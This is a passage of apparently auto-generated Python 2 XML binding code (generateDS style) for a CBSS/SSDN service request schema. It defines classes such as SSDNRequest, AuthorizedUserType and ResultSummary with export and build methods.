quote_python(self.ServiceId).encode(ExternalEncoding))
if self.Version is not None:
showIndent(outfile, level)
outfile.write('Version=%s,\n' %
quote_python(self.Version).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ServiceId':
ServiceId_ = child_.text
ServiceId_ = self.gds_validate_string(
ServiceId_, node, 'ServiceId')
self.ServiceId = ServiceId_
elif nodeName_ == 'Version':
Version_ = child_.text
Version_ = self.gds_validate_string(Version_, node, 'Version')
self.Version = Version_
else:
obj_ = self.gds_build_any(node, 'ServiceRequestType')
self.set_any_(obj_)
# end class ServiceRequestType
class Version(GeneratedsSuper):
"""Version of the service request"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if Version.subclass:
return Version.subclass(*args_, **kwargs_)
else:
return Version(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='Version', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='Version')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='Version'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='Version', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='Version'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class Version
class RequestContextType(GeneratedsSuper):
"""context information regarding the request"""
subclass = None
superclass = None
def __init__(self, AuthorizedUser=None, Message=None):
self.AuthorizedUser = AuthorizedUser
self.Message = Message
def factory(*args_, **kwargs_):
if RequestContextType.subclass:
return RequestContextType.subclass(*args_, **kwargs_)
else:
return RequestContextType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_AuthorizedUser(self):
return self.AuthorizedUser
def set_AuthorizedUser(self, AuthorizedUser):
self.AuthorizedUser = AuthorizedUser
def get_Message(self):
return self.Message
def set_Message(self, Message):
self.Message = Message
def export(self, outfile, level, namespace_='', name_='RequestContextType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='RequestContextType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='RequestContextType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='RequestContextType', fromsubclass_=False):
if self.AuthorizedUser:
self.AuthorizedUser.export(
outfile, level, namespace_, name_='AuthorizedUser', )
if self.Message:
self.Message.export(outfile, level, namespace_, name_='Message')
def hasContent_(self):
if (
self.AuthorizedUser is not None or
self.Message is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='RequestContextType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.AuthorizedUser is not None:
showIndent(outfile, level)
outfile.write('AuthorizedUser=model_.AuthorizedUserType(\n')
self.AuthorizedUser.exportLiteral(
outfile, level, name_='AuthorizedUser')
showIndent(outfile, level)
outfile.write('),\n')
if self.Message is not None:
showIndent(outfile, level)
outfile.write('Message=model_.RequestMessageType(\n')
self.Message.exportLiteral(outfile, level, name_='Message')
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'AuthorizedUser':
obj_ = AuthorizedUserType.factory()
obj_.build(child_)
self.set_AuthorizedUser(obj_)
elif nodeName_ == 'Message':
obj_ = RequestMessageType.factory()
obj_.build(child_)
self.set_Message(obj_)
# end class RequestContextType
class SSDNRequest(GeneratedsSuper):
"""Request sent to the CBSS"""
subclass = None
superclass = None
def __init__(self, RequestContext=None, ServiceRequest=None):
self.RequestContext = RequestContext
if ServiceRequest is None:
self.ServiceRequest = []
else:
self.ServiceRequest = ServiceRequest
def factory(*args_, **kwargs_):
if SSDNRequest.subclass:
return SSDNRequest.subclass(*args_, **kwargs_)
else:
return SSDNRequest(*args_, **kwargs_)
factory = staticmethod(factory)
def get_RequestContext(self):
return self.RequestContext
def set_RequestContext(self, RequestContext):
self.RequestContext = RequestContext
def get_ServiceRequest(self):
return self.ServiceRequest
def set_ServiceRequest(self, ServiceRequest):
self.ServiceRequest = ServiceRequest
def add_ServiceRequest(self, value):
self.ServiceRequest.append(value)
def insert_ServiceRequest(self, index, value):
self.ServiceRequest[index] = value
def export(self, outfile, level, namespace_='', name_='SSDNRequest', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='SSDNRequest')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='SSDNRequest'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='SSDNRequest', fromsubclass_=False):
if self.RequestContext:
self.RequestContext.export(
outfile, level, namespace_, name_='RequestContext', )
for ServiceRequest_ in self.ServiceRequest:
ServiceRequest_.export(
outfile, level, namespace_, name_='ServiceRequest')
def hasContent_(self):
if (
self.RequestContext is not None or
self.ServiceRequest
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='SSDNRequest'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.RequestContext is not None:
showIndent(outfile, level)
outfile.write('RequestContext=model_.RequestContextType(\n')
self.RequestContext.exportLiteral(
outfile, level, name_='RequestContext')
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('ServiceRequest=[\n')
level += 1
for ServiceRequest_ in self.ServiceRequest:
showIndent(outfile, level)
outfile.write('model_.ServiceRequestType(\n')
ServiceRequest_.exportLiteral(
outfile, level, name_='ServiceRequestType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'RequestContext':
obj_ = RequestContextType.factory()
obj_.build(child_)
self.set_RequestContext(obj_)
elif nodeName_ == 'ServiceRequest':
obj_ = ServiceRequestType.factory()
obj_.build(child_)
self.ServiceRequest.append(obj_)
# end class SSDNRequest
class RequestMessageType(GeneratedsSuper):
"""Information about the message being sent, provided by the sender"""
subclass = None
superclass = None
def __init__(self, Reference=None, TimeRequest=None):
self.Reference = Reference
self.TimeRequest = TimeRequest
def factory(*args_, **kwargs_):
if RequestMessageType.subclass:
return RequestMessageType.subclass(*args_, **kwargs_)
else:
return RequestMessageType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Reference(self):
return self.Reference
def set_Reference(self, Reference):
self.Reference = Reference
def get_TimeRequest(self):
return self.TimeRequest
def set_TimeRequest(self, TimeRequest):
self.TimeRequest = TimeRequest
def validate_t_DateTimeUTC(self, value):
# Validate type t_DateTimeUTC, a restriction on xs:string.
pass
def export(self, outfile, level, namespace_='', name_='RequestMessageType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='RequestMessageType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='RequestMessageType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='RequestMessageType', fromsubclass_=False):
if self.Reference is not None:
showIndent(outfile, level)
outfile.write('<%sReference>%s</%sReference>\n' %
(namespace_, self.gds_format_string(quote_xml(self.Reference).encode(ExternalEncoding), input_name='Reference'), namespace_))
if self.TimeRequest is not None:
showIndent(outfile, level)
outfile.write('<%sTimeRequest>%s</%sTimeRequest>\n' %
(namespace_, self.gds_format_string(quote_xml(self.TimeRequest).encode(ExternalEncoding), input_name='TimeRequest'), namespace_))
def hasContent_(self):
if (
self.Reference is not None or
self.TimeRequest is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='RequestMessageType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Reference is not None:
showIndent(outfile, level)
outfile.write('Reference=%s,\n' %
quote_python(self.Reference).encode(ExternalEncoding))
if self.TimeRequest is not None:
showIndent(outfile, level)
outfile.write('TimeRequest=%s,\n' %
quote_python(self.TimeRequest).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Reference':
Reference_ = child_.text
Reference_ = self.gds_validate_string(
Reference_, node, 'Reference')
self.Reference = Reference_
elif nodeName_ == 'TimeRequest':
TimeRequest_ = child_.text
TimeRequest_ = self.gds_validate_string(
TimeRequest_, node, 'TimeRequest')
self.TimeRequest = TimeRequest_
# validate type t_DateTimeUTC
self.validate_t_DateTimeUTC(self.TimeRequest)
# end class RequestMessageType
class AuthorizedUserType(GeneratedsSuper):
"""User identification information"""
subclass = None
superclass = None
def __init__(self, UserID=None, Email=None, OrgUnit=None, MatrixID=None, MatrixSubID=None):
self.UserID = UserID
self.Email = Email
self.OrgUnit = OrgUnit
self.MatrixID = MatrixID
self.MatrixSubID = MatrixSubID
def factory(*args_, **kwargs_):
if AuthorizedUserType.subclass:
return AuthorizedUserType.subclass(*args_, **kwargs_)
else:
return AuthorizedUserType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_UserID(self):
return self.UserID
def set_UserID(self, UserID):
self.UserID = UserID
def validate_t_SSIN(self, value):
# Validate type t_SSIN, a restriction on xs:string.
pass
def get_Email(self):
return self.Email
def set_Email(self, Email):
self.Email = Email
def validate_t_EmailAddress(self, value):
# Validate type t_EmailAddress, a restriction on xs:string.
pass
def get_OrgUnit(self):
return self.OrgUnit
def set_OrgUnit(self, OrgUnit):
self.OrgUnit = OrgUnit
def get_MatrixID(self):
return self.MatrixID
def set_MatrixID(self, MatrixID):
self.MatrixID = MatrixID
def get_MatrixSubID(self):
return self.MatrixSubID
def set_MatrixSubID(self, MatrixSubID):
self.MatrixSubID = MatrixSubID
def export(self, outfile, level, namespace_='', name_='AuthorizedUserType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='AuthorizedUserType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AuthorizedUserType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='AuthorizedUserType', fromsubclass_=False):
if self.UserID is not None:
showIndent(outfile, level)
outfile.write('<%sUserID>%s</%sUserID>\n' %
(namespace_, self.gds_format_string(quote_xml(self.UserID).encode(ExternalEncoding), input_name='UserID'), namespace_))
if self.Email is not None:
showIndent(outfile, level)
outfile.write('<%sEmail>%s</%sEmail>\n' %
(namespace_, self.gds_format_string(quote_xml(self.Email).encode(ExternalEncoding), input_name='Email'), namespace_))
if self.OrgUnit is not None:
showIndent(outfile, level)
outfile.write('<%sOrgUnit>%s</%sOrgUnit>\n' %
(namespace_, self.gds_format_string(quote_xml(self.OrgUnit).encode(ExternalEncoding), input_name='OrgUnit'), namespace_))
if self.MatrixID is not None:
showIndent(outfile, level)
outfile.write('<%sMatrixID>%s</%sMatrixID>\n' %
(namespace_, self.gds_format_integer(self.MatrixID, input_name='MatrixID'), namespace_))
if self.MatrixSubID is not None:
showIndent(outfile, level)
outfile.write('<%sMatrixSubID>%s</%sMatrixSubID>\n' %
(namespace_, self.gds_format_integer(self.MatrixSubID, input_name='MatrixSubID'), namespace_))
def hasContent_(self):
if (
self.UserID is not None or
self.Email is not None or
self.OrgUnit is not None or
self.MatrixID is not None or
self.MatrixSubID is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='AuthorizedUserType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.UserID is not None:
showIndent(outfile, level)
outfile.write('UserID=%s,\n' %
quote_python(self.UserID).encode(ExternalEncoding))
if self.Email is not None:
showIndent(outfile, level)
outfile.write('Email=%s,\n' %
quote_python(self.Email).encode(ExternalEncoding))
if self.OrgUnit is not None:
showIndent(outfile, level)
outfile.write('OrgUnit=%s,\n' %
quote_python(self.OrgUnit).encode(ExternalEncoding))
if self.MatrixID is not None:
showIndent(outfile, level)
outfile.write('MatrixID=%d,\n' % self.MatrixID)
if self.MatrixSubID is not None:
showIndent(outfile, level)
outfile.write('MatrixSubID=%d,\n' % self.MatrixSubID)
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'UserID':
UserID_ = child_.text
UserID_ = self.gds_validate_string(UserID_, node, 'UserID')
self.UserID = UserID_
self.validate_t_SSIN(self.UserID) # validate type t_SSIN
elif nodeName_ == 'Email':
Email_ = child_.text
Email_ = self.gds_validate_string(Email_, node, 'Email')
self.Email = Email_
# validate type t_EmailAddress
self.validate_t_EmailAddress(self.Email)
elif nodeName_ == 'OrgUnit':
OrgUnit_ = child_.text
OrgUnit_ = self.gds_validate_string(OrgUnit_, node, 'OrgUnit')
self.OrgUnit = OrgUnit_
elif nodeName_ == 'MatrixID':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'MatrixID')
self.MatrixID = ival_
elif nodeName_ == 'MatrixSubID':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'MatrixSubID')
self.MatrixSubID = ival_
# end class AuthorizedUserType
class ResultSummary(GeneratedsSuper):
"""Summary infomation about the resultlors de la reponse, (messageType
RESPONSE | EXCEPTION), la valeur WARNING signifie qu'il faut
consulter l'element Information"""
subclass = None
superclass = None
def __init__(self, ok=None, ReturnCode=None, Detail=None):
self.ok = _cast(None, ok)
self.ReturnCode = ReturnCode
if Detail is None:
self.Detail = []
else:
self.Detail = Detail
def factory(*args_, **kwargs_):
if ResultSummary.subclass:
return ResultSummary.subclass(*args_, **kwargs_)
else:
return ResultSummary(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ReturnCode(self):
return self.ReturnCode
def set_ReturnCode(self, ReturnCode):
self.ReturnCode = ReturnCode
def get_Detail(self):
return self.Detail
def set_Detail(self, Detail):
self.Detail = Detail
def add_Detail(self, value):
self.Detail.append(value)
def insert_Detail(self, index, value):
self.Detail[index] = value
def get_ok(self):
return self.ok
def set_ok(self, ok):
self.ok = ok
def validate_ResultSummaryStatusType(self, value):
# Validate type ResultSummaryStatusType, a restriction on xs:string.
pass
def export(self, outfile, level, namespace_='', name_='ResultSummary', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='ResultSummary')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ResultSummary'):
if self.ok is not None and 'ok' not in already_processed:
already_processed.append('ok')
outfile.write(' ok=%s' % (quote_attrib(self.ok), ))
def exportChildren(self, outfile, level, namespace_='', name_='ResultSummary', fromsubclass_=False):
if self.ReturnCode is not None:
showIndent(outfile, level)
outfile.write('<%sReturnCode>%s</%sReturnCode>\n' %
(namespace_, self.gds_format_integer(self.ReturnCode, input_name='ReturnCode'), namespace_))
for Detail_ in self.Detail:
Detail_.export(outfile, level, namespace_, name_='Detail')
def hasContent_(self):
if (
self.ReturnCode is not None or
self.Detail
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='ResultSummary'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.ok is not None and 'ok' not in already_processed:
already_processed.append('ok')
showIndent(outfile, level)
outfile.write('ok = "%s",\n' % (self.ok,))
def exportLiteralChildren(self, outfile, level, name_):
if self.ReturnCode is not None:
showIndent(outfile, level)
outfile.write('ReturnCode=%d,\n' % self.ReturnCode)
showIndent(outfile, level)
outfile.write('Detail=[\n')
level += 1
for Detail_ in self.Detail:
showIndent(outfile, level)
outfile.write('model_.DetailMessageType(\n')
Detail_.exportLiteral(outfile, level, name_='DetailMessageType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('ok', node)
if value is not None and 'ok' not in already_processed:
already_processed.append('ok')
self.ok = value
# validate type ResultSummaryStatusType
self.validate_ResultSummaryStatusType(self.ok)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ReturnCode':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'ReturnCode')
self.ReturnCode = ival_
elif nodeName_ == 'Detail':
obj_ = DetailMessageType.factory()
obj_.build(child_)
self.Detail.append(obj_)
# end class ResultSummary
class ReturnCode(GeneratedsSuper):
"""general return code. 0 = OK, 1 = WARNING, 10000 = ERROR"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if ReturnCode.subclass:
return ReturnCode.subclass(*args_, **kwargs_)
else:
return ReturnCode(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='ReturnCode', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='ReturnCode')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ReturnCode'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='ReturnCode', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='ReturnCode'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class ReturnCode
class InformationType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, FieldName=None, FieldValue=None):
self.FieldName = FieldName
self.FieldValue = FieldValue
def factory(*args_, **kwargs_):
if InformationType.subclass:
return InformationType.subclass(*args_, **kwargs_)
else:
return InformationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_FieldName(self):
return self.FieldName
def set_FieldName(self, FieldName):
self.FieldName = FieldName
def get_FieldValue(self):
return self.FieldValue
def set_FieldValue(self, FieldValue):
self.FieldValue = FieldValue
def export(self, outfile, level, namespace_='', name_='InformationType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='InformationType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='InformationType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='InformationType', fromsubclass_=False):
if self.FieldName is not None:
showIndent(outfile, level)
outfile.write('<%sFieldName>%s</%sFieldName>\n' %
(namespace_, self.gds_format_string(quote_xml(self.FieldName).encode(ExternalEncoding), input_name='FieldName'), namespace_))
if self.FieldValue is not None:
showIndent(outfile, level)
outfile.write('<%sFieldValue>%s</%sFieldValue>\n' %
(namespace_, self.gds_format_string(quote_xml(self.FieldValue).encode(ExternalEncoding), input_name='FieldValue'), namespace_))
def hasContent_(self):
if (
self.FieldName is not None or
self.FieldValue is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='InformationType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.FieldName is not None:
showIndent(outfile, level)
outfile.write('FieldName=%s,\n' %
quote_python(self.FieldName).encode(ExternalEncoding))
if self.FieldValue is not None:
showIndent(outfile, level)
outfile.write('FieldValue=%s,\n' %
quote_python(self.FieldValue).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'FieldName':
FieldName_ = child_.text
FieldName_ = self.gds_validate_string(
FieldName_, node, 'FieldName')
self.FieldName = FieldName_
elif nodeName_ == 'FieldValue':
FieldValue_ = child_.text
FieldValue_ = self.gds_validate_string(
FieldValue_, node, 'FieldValue')
self.FieldValue = FieldValue_
# end class InformationType
class FieldName(GeneratedsSuper):
"""name of the field"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if FieldName.subclass:
return FieldName.subclass(*args_, **kwargs_)
else:
return FieldName(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='FieldName', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='FieldName')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='FieldName'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='FieldName', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='FieldName'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class FieldName
class FieldValue(GeneratedsSuper):
"""value of the field"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if FieldValue.subclass:
return FieldValue.subclass(*args_, **kwargs_)
else:
return FieldValue(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='FieldValue', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='FieldValue')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='FieldValue'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='FieldValue', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='FieldValue'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class FieldValue
class DetailMessageType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Severity=None, ReasonCode=None, Diagnostic=None, AuthorCodeList=None, Information=None):
self.Severity = Severity
self.ReasonCode = ReasonCode
self.Diagnostic = Diagnostic
self.AuthorCodeList = AuthorCodeList
if Information is None:
self.Information = []
else:
self.Information = Information
def factory(*args_, **kwargs_):
if DetailMessageType.subclass:
return DetailMessageType.subclass(*args_, **kwargs_)
else:
return DetailMessageType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Severity(self):
return self.Severity
def set_Severity(self, Severity):
self.Severity = Severity
def validate_SeverityType(self, value):
# Validate type SeverityType, a restriction on xs:string.
pass
def get_ReasonCode(self):
return self.ReasonCode
def set_ReasonCode(self, ReasonCode):
self.ReasonCode = ReasonCode
def get_Diagnostic(self):
return self.Diagnostic
def set_Diagnostic(self, Diagnostic):
self.Diagnostic = Diagnostic
def get_AuthorCodeList(self):
return self.AuthorCodeList
def set_AuthorCodeList(self, AuthorCodeList):
self.AuthorCodeList = AuthorCodeList
def get_Information(self):
return self.Information
def set_Information(self, Information):
self.Information = Information
def add_Information(self, value):
self.Information.append(value)
def insert_Information(self, index, value):
self.Information[index] = value
def export(self, outfile, level, namespace_='', name_='DetailMessageType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='DetailMessageType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
